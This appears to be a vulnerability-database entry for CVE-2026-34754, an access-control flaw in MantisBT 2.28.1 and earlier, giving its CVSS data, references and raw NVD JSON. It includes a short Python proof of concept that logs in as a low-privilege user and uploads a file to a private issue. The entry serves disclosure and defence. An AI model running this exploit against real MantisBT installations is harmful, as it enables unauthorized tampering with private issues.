Security Vulnerability Report
CVE-2026-34754 CVSS 4.3 MEDIUM

CVE-2026-34754

Published: 2026-05-20 00:16:35
Last Modified: 2026-05-20 14:06:34

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mantis Bug Tracker <= 2.28.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://localhost/mantisbt/bug_file_add.php"
login_url = "http://localhost/mantisbt/login.php"
username = "low_priv_user"
password = "password"
target_bug_id = "100"  # ID of a private issue

session = requests.Session()

# Step 1: Authenticate to get a valid session
login_payload = {
    "username": username,
    "password": password,
    "return": "index.php"
}
print("[*] Attempting login...")
session.post(login_url, data=login_payload)

# Step 2: Upload attachment to private issue
# The vulnerability lies in the lack of access check for 'bug_id'
files = {
    'file': ('malicious_payload.txt', b'This is an unauthorized upload.', 'text/plain')
}
upload_data = {
    'bug_id': target_bug_id,
    'max_file_size': '5000000'
}
print(f"[*] Attempting to upload file to private issue {target_bug_id}...")
response = session.post(target_url, files=files, data=upload_data)

if response.status_code == 200 and "File uploaded successfully" in response.text:
    print("[+] Exploit successful! File uploaded to unauthorized private issue.")
else:
    print("[-] Exploit failed or issue already patched.")

References

https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206
https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc
https://mantisbt.org/bugs/view.php?id=36976

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34754",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-20T00:16:34.857",
    "lastModified": "2026-05-20T14:06:33.993",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-284"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206", "source": "[email protected]"},
      {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc", "source": "[email protected]"},
      {"url": "https://mantisbt.org/bugs/view.php?id=36976", "source": "[email protected]"}
    ]
  }
}